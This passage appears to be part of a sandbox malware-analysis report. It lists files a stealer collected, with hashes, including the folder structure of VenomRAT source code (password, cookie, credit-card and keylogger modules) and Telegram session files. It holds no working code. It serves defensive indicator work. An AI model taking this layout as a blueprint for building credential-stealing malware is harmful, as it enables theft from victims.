SHA11abb9d238864e9bc7fdf65036c0359823ffe9f2d
SHA256fefe01cd111212ad77c0b20a4ef7e240840fa7d9cbf764381540f8a0219db6d3
SHA512d56c4df42772404003e156eabf467cd2b9b87a5df534ce3e1a7761137b70bcc4aa37ef8ce6ef50676ed03d8c27c075e9f577f2ff9272996d6e4c7c6d716167a9
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Helper\ReferenceLoader.cs
Filesize1KB
MD53b68a10f8ab40ddbad4b8e7c08ad4419
SHA1684ec9bb188095135bc6251d5ee484dd25770698
SHA25643d6d047449b56edb170a29f56a74830417811b57eaaa98456568d357e9f7efd
SHA51224940844a97bfefa6467b8599ffcf6c7c3a9ffa4e1840f24d7f4a6fcf3be0052f7949334d221c9c1dcc1c4c3c5d953668f7b49b251a3afaea2f28fc0cc46a1bf
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Helper\RegValueHelper.cs
Filesize1KB
MD52f748f00a802f1b82e8699dd16028c76
SHA1bc1d7ccd04ad26592245c9bd514ac46f578f1ba6
SHA256dc54eb8ec033fa6a59874458d8c326a80a8a471ae1ac82b15eb1589d416b01b1
SHA51238bbac9d0ce9535b7ab1d9e52ad33e0bc20303e522ec4c029b4522d0c93c3ac62f8a617d0eb5b1384e404fdacca1b7c87bfa4dfb01f71c0e03bf28249779ebc2
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Helper\RegistryKeyExtensions.cs
Filesize1KB
MD5dd0a7f3e654110b4df128653086c0c73
SHA1ea87c2df37cf59cb82b2cfe63fea8bb11f0e206e
SHA256d048bfb8bf1913554dd8f3d77465f5c7f6c028ca14fb24c5b5ae2609dae094c9
SHA51252567cb54cd3b1df1c2ba091ba8da4f728058370691575bc26d95872e34be67379d8656b6ff512a055fb89321cd08cd45af9ae172eb0cd1fad553d7dfbf7c341
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Helper\RegistryKeyHelper.cs
Filesize3KB
MD5e899b2e55a077821b065d7c37b69be73
SHA1576b724dac36426c45e8fbc185c3defb6fd8da5b
SHA25643e55b01c8ab6f7076e0846daf9f2174bd1ec1f2c49df862ed093b94c71cd80f
SHA512ee3a81eaacc5d321e68f15935dcacb1552afe8955cf0230ae9bf5eba8450b2079263968dd70bdee5d68c1bd617060cabdbeca619ecce281f3f0b6bb7fca9a6d3
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Helper\RegistrySeeker.cs
Filesize4KB
MD5371e883334ed081f5460aa48ae81b008
SHA1c066a4d4b60bf8f09795e642cda63d3b55b83a6d
SHA2562c4428d31b57758446407ce3d0dcb3c9b45578f9f3c0eace03d3e85572deb9c7
SHA512eb7e3c65d7610977b6042be8728fab91132e823c2e4ac2fddb1963c9c07c0c18e3b97e7d8e12f0601db3a1ca2548d6cb49b513e30c1105e83dbf9987ee7f8deb
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Helper\RegistryTreeView.cs
Filesize243B
MD56616155a89ffd9e2ba4f8af3bf7e2edb
SHA13e1072729e2161b98bbd450986e0bcaf0167c2c2
SHA2563257621d0239553e2834856a4a6bf9837c35bd8fb4f2bb4f0d555008b123ed95
SHA512d2e7a806ebf4fa8487dc7eb55d4a46778ed41f5fd9dff182a72e79d021c6e8095daa03d1b5c17f5e0918d41e2238848dc749b47e75e1fdaef17aa3f6d535fe53
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Helper\RegistryValueLstItem.cs
Filesize1KB
MD593ecf2ea2be1b8c42bde29af788a3c19
SHA14dcf98304df2e7090a9e99be30e5d1104d35bfd8
SHA2565b6232cb07d873994b186eb29c2a671c4574d85fb741eb3425edc8b95947bcad
SHA512b3d35d91131e9f1150a8bc08a9df00d0baa2517b390d247553521b0f90d5df5c91e5098fc010e3d86c707fd1b4a58734cc8c4e159f70e68311070dbd57ff0f8d
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Helper\TelegramNotify.cs
Filesize561B
MD5e8f7ac632a0e55aaf483454657f9ed94
SHA11df19ca081b342596810e916d17109c682ba8e1f
SHA2567743c6e53e9201b9014d7b7302e258f2cc2421c440c43f2b2c40f51f9a1bea5f
SHA512b1174a888d8b7dea247db39f1a68a02a1bd4543dc60fb65f432b4d5eda8c7d22df04dab098ff06fc7051b031ac20115a618f51c043a940337843bddb0583e28f
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Helper\Utils.cs
Filesize2KB
MD565b244f3694a60d2ee8a729f05b26fd5
SHA10c02cedf54bdde9e258a8acaedb5b13fc5730bd4
SHA2562323a8529da09c3713b3f361b738318eb3f8ba7b520d3cd23088138d70179e17
SHA5124fc1a8db3b393c8db55999af1eb2dfda054877cec1d2002ed5429686b5ad705064fb5653b50fb5ea5da6e9d4a3807e3ad95466cd925aed122f88b14d28a0996a
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Helper\WordTextBox.cs
Filesize3KB
MD5d3acf77b98823554278215a70884c0aa
SHA18b3b45cb6dfdc481dc17c1881c754a8ddd661a89
SHA256d7abef2dbac887746e25eb6fc298bb8514fd41b0db9702023c00269751047c5e
SHA512b40ba3cd039f8445adcf7f912e1892ff795d8ca47443e9359a156ef6c885f99b07e0e41e3b091cf9b982ad44af27c35f75c8660093fb51c63bfae8cf0646d0d7
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Params\KeylogParams.cs
Filesize1KB
MD5387028585bc46163e05dfef0d12b8c2b
SHA11e2435782ceb9f424e8076415f43b79adcdb3ad5
SHA2568fbcb22c04c822ca8fdfcfc73530ee86bbdfb3409296e5b7fde2335d49260dcb
SHA51229e5ff340380acdbedfa867ecddd026f4fb22d2d7926a8ca00220edbc2c22f03c4308428c456f5f60e047e89412e3a2b6ecf0c5dc54ab34496d71630e0c79c5c
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Program.cs
Filesize656B
MD59983afc9cabe9d3dd4ada69eab506be8
SHA1de787d6bfe059704dd423c16ca1bc7d7be484ff0
SHA2564899f962b1c941840909a847d8698eb1e204245e63c6fb9387ae8592636b8678
SHA512b2be2899019936d153598d4801696b61c510a0accde2e86848e68f0f96349047c5fb041b8a08f9d4190bc33c884055e90018c67e88a290610393886d77d3341b
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Properties\AssemblyInfo.cs
Filesize610B
MD5267a4458073d63d15dd45206b8d0a9d4
SHA1d8b38d5704f0b97b1a23c631b8d1d1066e32566f
SHA256bbdb72df30f7a00ee2b9166c78d5c8b49b63dc8131c9316241c802675769d071
SHA51282af93cf6365cded13b0e8da1b132ae3063ebc241c601550230d1ea7b79b2f779387848862aa4f20b8c59f89b396d59e2596a4724b929b4a66a321ebddb778b1
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\ReverseProxy\ReverseProxyCommand.cs
Filesize114B
MD5e51f5ee288886e27f166eea6a445506d
SHA1d26617d37d3c44a0dfc225c9a9b438c9fbb67dae
SHA2568a4b87e5437a56940c6e3941de246d9c0febfe93589ee841c74283685fd607ce
SHA512181750d8a6f1f4f097999182fe8bb2f1f4b4f576004bc825d5cef1bc9457b31156a565ecf2e3fd635a45c8d76dc8a65a72c8390627c97b14d521fa00196a5b5d
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\ReverseProxy\ReverseProxyCommands.cs
Filesize133B
MD5381f481ebe1396b8b822810286c37a00
SHA1f3d328db60e98257ab2548ad304fcb53900cc175
SHA25626c6d0b9711f2a12185bf88328da1ad4cea71ee78266d8e358a23bfab5e6af4a
SHA512895d6a8b1fd6465be798d8693981b98adec6a7fa72310e1f842046c2b1081a9e2935c1a5e1509bd21431185d1b81f3279201769aebff8f079034d72f69dd1adc
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\ReverseProxy\ReverseProxyConnect.cs
Filesize167B
MD5b920e1118b8a15e365f92543d4218233
SHA14fb34abedde7814a3c7c58290b0afac22fb9449c
SHA256b0413a666bc601196aeec31e43f9c1f5ac46909285283363a92b07b9377fa415
SHA51277eb145b7f218b193c39ffb8735880afd2ba4f6c2b15fabe26372f71b7c91f959b5e7f490ce6dc70989f2ab05358aed5444a5b00115008701b3dd23791003204
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\ReverseProxy\ReverseProxyConnectResponse.cs
Filesize309B
MD5442dfccaffae0de4b25ec3b8d8377f6f
SHA10c4b090ff6227d856cd0bd71ea502f22cd7a76d1
SHA2567335f88328c4d5951af68fbd8ac5706c1a217dd00efc201964dc74bbdd47dbfa
SHA512de6515852b7110f51002d4c2ccc61dca7c227a9bc7468f226a39e6b95b1430ef4bf981dbb9215150bd4e3416b89f2474313f01a7a54cbee52902559181e0d33b
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\ReverseProxy\ReverseProxyData.cs
Filesize128B
MD56a2fae9ed2ed27953b6ef3d049d78d11
SHA13b26b4fd7c624593a8e6c5aff55b64e85c4b2e1d
SHA256f3eb8f7003ef84b0062ed4f6a42cda6d835aeafc820b155278daef281ee5a5f1
SHA51292eee89c555f35072327bf5c72ce695f7bb9636da4f5b6ac055b80590110f122d66943d1fa5b14b6857af3da78208a130c028e9249458e15b826c21bdaef6a75
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\ReverseProxy\ReverseProxyDisconnect.cs
Filesize99B
MD58a57c36ab79ff6f251bf6225cc36f930
SHA174775da40da336bc493f38737b6d368bb5c1d989
SHA256bb299c3e47c6211cc135f8e66b9bf877ddf126ddc94b81f27ae0f2fc4e24cbd8
SHA512fbf5b8871fd256aec2299245c96d8db65c2f90cf0a3ae87b926b1a766798256ea15b37df1b0aa73fc72f920d9a49b3444707198f5f0204e5d32771e819d826e9
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\ReverseProxy\ReverseProxyServer.cs
Filesize3KB
MD521e96715a31bafc4c4de31cbe4d452bd
SHA158b42379e2e1030a6a3610ad86e7610c2622e954
SHA2567b45a4e10c1c04d1cd00bca92c159b5c1ffee0df726ec1f481828c0198bc43ae
SHA512773b240f609bfabb60564ba1e67622da59a2a59dbf0c01d08388053e39673c442ea15e5452a5f62c2d9779d8bf1928112ed67472070a8cd7434153e89a3a4fb9
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Settings.cs
Filesize1KB
MD5d1407c09b8ae4a5b76b410bfd5db084b
SHA1a784a35f4890cdd4b9639572250b1e73e7caa2b8
SHA256adcb29c4d6b6e502e6581527a7431fc273b42490f9ddaca92a9c06adf51613e7
SHA512ec09d1a01aee6bfa6a905065b5979b7a98a115636a6cd50ed04d6178cc39776a9161d6eafe4f56cd2a6c5c499a0f3a09a34b26320af2bc1ae32a624197e38f05
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Stealer\AutoFill.cs
Filesize133B
MD506dd1b49d449bbdfd7bd4947c5dbdf5d
SHA1e29dbebeb6886c9ad8558204a36b9056fe964e87
SHA2562b696750c80d37c5f892b9480e895201e4052562ea86e4b412179a38755ccf39
SHA512e0a7cbac49ce2c33b19c9a048afd9c58d505c1751902eeacc7dc9147183c5d0c54d048f00bc43df9c018232058c4843c8068b125bb2126e3a81827b09986396e
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Stealer\Bookmark.cs
Filesize132B
MD54463fa44fad4e3cc45f77c7913cdb71e
SHA14c8ed2679ce33a8f791c1082d81f581f91a28ab8
SHA2567771734f8228683679aa79dbc6f9882b39a51d5f9b33d1c3d15b5412ac80d9b5
SHA51261e38e68a509fffddc6e9c8ae5e679171c59460bc30495307617dd28d2eb29f50076f902e727e0edb00ca8e3a25ac31124e5c73dcd27160dd256b75fa5952cfd
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Stealer\BrsInfo.cs
Filesize534B
MD55788ce26821fd0f0e1f06fb2583e5b51
SHA1902c924db816631653029dd69143f41bc869dbc1
SHA256119eb2eb5ae8e07cd5ae521ff9a67ae1c15bbb4c091a47c51ac6062bf2b05504
SHA512c1dbd742b0bd23f406b2351ea6ba09094c1616e5c2aaf66f99bc1894d039dc28720d395c34bfd293bc6ce06f8628f471b36970888ea615f1589e9739d485b575
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Stealer\BrsType.cs
Filesize210B
MD5ade61b9e7791d5fddeffb6339203c6d6
SHA18ab167c9ff2c0eef56bbda5126784a5b5cc8db94
SHA2563285ba8ce5a9691da2b76630c44eb0e39bf34ab0129314d86c73f3b09d7ab9f9
SHA512a5663f92284d38698a716c36628710700ffaf08e1ee579947b642be12c09bba6f1a3ba342d9f3b6de23746ba733c65cc0b86b0367d57b5d7546a5232123b2832
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Stealer\Consts.cs
Filesize139B
MD5d73297f7f1621f5cf5c220b5496821b0
SHA1c2930e18454b96b1121b91c53b716fe2ff6bbb26
SHA25677d362a23ed8ab9c45124c33c06a6656cf76a3de4c832bee366a4c3d89967c5f
SHA512ca895aec7fa1843e1eab7ccfb4d18f45a43e263020a1ca3377d06e27c3ac3e33c64e90ebf277e4949098d8652a5a708c8a4f282fe916a61814d1940e81af6e19
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Stealer\Cookie.cs
Filesize486B
MD55b77ccbbd45ab0290b4d5207bfcd9bf7
SHA1b12210e6e8bfe7df4cd84d1094c2fe5c61aba080
SHA256913ab7a9430c0c19f77707176aedb6864efee06513f7315afdcf930c83693ec3
SHA5122fa3aebac03a21dc9c4a82b35d95436f0676b92b4aa524ea576653c337148e103196a3ec6110e3b5f84cbc5c9b33ae8b590c1aea487979ae14593d8b692efc31
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Stealer\CreditCard.cs
Filesize219B
MD561f089ebc0ee091ceffe42317afe621a
SHA19e9ee841c5942920efcbd3a366db6bd6f3156286
SHA256c1294e5eaaef280c5296e17966e052e36f3cff691ae5e1b523e07dc95839d2c3
SHA51254d29af8b33bc3438b2f7bae4eece8d842b6c646176328eaca082445915ba3279e6492fe75136dd933ba4744948a4ed8d8621727a847ebdd6b1bcf0985593fa9
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Stealer\Item.cs
Filesize82B
MD59eda6e16b6296d9a00ed97bcd598154a
SHA1ec3b8db7101cef3741577b37c9148eaacd4940e2
SHA256a2bf2f275b5970d22ac18a88b8675ca55ddeea6bbcc965de6fd3d6c9abfd6d88
SHA512df623146386cc850251e39429ad59a14caea2cde3e9502b30ad0fe8bf8f67fb089cee6f20ee04a4a1cc2796b552f51dc1ddf94de775bf5a429e772e0e0e54b8a
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Stealer\Password.cs
Filesize216B
MD5f1cecb9b1632de9a034a1314c4d59f1b
SHA153644c530576e0e09c56c1a4bce188b00bf21c00
SHA2566004fbc761d9473d0e3357886d8c10ad67583d0a3599a167a9e360bb1cc93cba
SHA512f4cf7386c4efdb88cfac7dc5c771f381f8b2d9fe7e017926ac305f32148ff7f031ac84f985753f6bb6f8a85f5084093a4f9e01a4d12eeb456fb50e091bd584ba
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\Stealer\Site.cs
Filesize164B
MD533039c1036a6e2d7f3961efdf861e85e
SHA1b5459d808e82cc3f627246b112c18235964f78b7
SHA2560b30435f2b120d7c30aab9be9bb366a38bebe885ac831e65797710382980aa48
SHA51266854d563d4239f126418dc4b33ef6e61d85ea2f5b73c1078e7dfbb2687a5da73197fa5958d0b9e39c3a952531e07fd46c017cd46f8f5dc0367bcc46a7fc83b6
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\StreamLibrary\CodecOption.cs
Filesize114B
MD5b730bbe016dfb8194fbb7829f89eb771
SHA104ee4f79bf724eb5c2c29ae48caa66b59c5b8917
SHA256b900b1da63a93175d7efad77cc60aff283c11c5612fb9f050f118d6a58aecb78
SHA512126ab22ee500204e2de75aeaf8fce0fca7efe337847e16b81e75a26d844976f897b1fa0aadfb970e4c0f5b60fef67795202391a42cf858d3e09718b17852b6ea
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\StreamLibrary\IUnsafeCodec.cs
Filesize1KB
MD53c8b1c3fc619354a0f5c562debd50912
SHA1e2dc929102d96381981d54ba9f0a3f0c544720b5
SHA256fe7a5cf6c9da269cddc00536cfee40e7aaddab8558602db37e2c2bec64eb310a
SHA5125d5f8ac2d3d4b51511877dad9652b5c2a108ec8c1cb28dd6a3b102c359aeae68d34ccfdd10b73dbd404eb8a994a3a470f1c808f3d8cd249388dfe61c98e619ea
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\StreamLibrary\IVideoCodec.cs
Filesize1KB
MD5855c70891cd2cc27a0dbda11d22fe31a
SHA17541babca7791fc8e0989c7abf0e348f3cf74893
SHA256fe37066968e515467090d1955966b2e058ea0ebe097d11dde68aa7ea0d9b4637
SHA512c74795dfb94b450605d25438c097b01468fb489e45e23abf93006a52997ae3e95b054b1d89e22d16e3ac40c36064e40f7dba9b61186a08a0201020383ce29ac2
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\StreamLibrary\src\JpgCompression.cs
Filesize1KB
MD5ab02eb131f97333a42d36a2508b8101e
SHA11d553de158ee4a4312f487eecaecb78305f2cfaf
SHA2568756ab89b3cbf74095ae33f4cd9bd0fc3f6c69b65224e998cc1110a2f120d020
SHA5127ee65207a50ccbcc0fb5cc6e57415aa483f897224fa64a831b6fa08f87a63b6bb6ee8152be875f3ce6678787226894699e1f2addd2c71bb791b6f5f45a320a8c
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\StreamLibrary\src\LzwCompression.cs
Filesize1KB
MD59c1e1efb37ed2d9531e95728e8970666
SHA1de4931ee31d49a26cc8453d5f0840394f594f88d
SHA256f8d4c840a8fcab93202cdef689953a1ad98dc99d0174a873d18e437bebfeabcd
SHA512f01c507cf2b3ec0fdcdded13789316d04d3a368ce044d41a3a49563ab544f7aba701de75b127e1b4449bcbc0fe449f2fee515d6adac94e7bf78359d7c67d0f39
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Source Code\StreamLibrary\src\NativeMethods.cs
Filesize718B
MD5d7163642b00e07ab4d8158bd4b95f11f
SHA1c98be6abae162414089d07ac913519a55d489c57
SHA256caad5e331af7e30e167bebed39c202d04110d89488744208f651acc875f9ca05
SHA5127064c8c32a1941798dee225a9b560a4346d0667e969b34a858bbae9ae4d3284ff2b472c24519c2a20365acb2aa32530c31db27f30052d8dfeda90fe35fd60e6b
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Messenger\Telegram\15B2D04879D7EC38s
Filesize140B
MD506d8f28b5336972bdc011d7d2ebc7181
SHA1a4878903420850b6b420ab17db8026ff04eb1b30
SHA2563a46d218936a274033ab731b6f33c7790f4d89b57e75d5c07652e1a6e860f808
SHA512b6de42ad522e63ad79484fd5d825d977ec7cd618b4cfb28c29909c6fbb15cde4809274cdf8b2f3ae625949d4e9a3a42bc6dd1d7c8e64ffd9ae69146d3d385881
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Messenger\Telegram\D877F783D5D3EF8C\E96BBE4AB8C59417s
Filesize492B
MD5dda169d7e7ce17f5f8457d684ed59823
SHA18f17fd46d4e846ea5b14f4be1f6145ee3da55205
SHA2569091f2e308d89f9840816404ff0626389366be1f90bb72cb666c9c635a7f8c85
SHA5125df00fee71c64ff1c51d658ec9f505a58f5fdc8bbfbfcacae8cbbba77b05ba5a1e6ae9f646af6009b9dc2097d80a1d760fb7e252a64a7771859b10e5ddd60761
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Messenger\Telegram\D877F783D5D3EF8C\configs
Filesize1KB
MD5b3aae483c05b3fc54cdf90097e6bd5c7
SHA102f8743962e457c95735b2878113ea288c54d8c7
SHA2561f5892f15c330203bac7137089e748e105885711f71c47cbd0e82fecc19f5596
SHA512c01fe84de36bfca882f69bfb64d9615f7cc37cd36afd57fe52aa2fb450c6e944aad7cf651e2df5fc5eefe2bca8da9f022bd92204c1c60029a1f24a291d90f7af
-
C:\Users\Admin\AppData\Local\5f2aea0b0b782efdb606d9585d57f585\Admin@DPGNQMQQ_en-US\Messenger\Telegram\D877F783D5D3EF8C\maps
Filesize276B
MD5ca3867a84e3f9f8d3d9b37457ef185a5
SHA153ab152a11ca37b84455b64992c4c7c990272285
SHA256328dd776790272b7fa9329cd3ae84628031e58643af0145c972d6a5706c41134
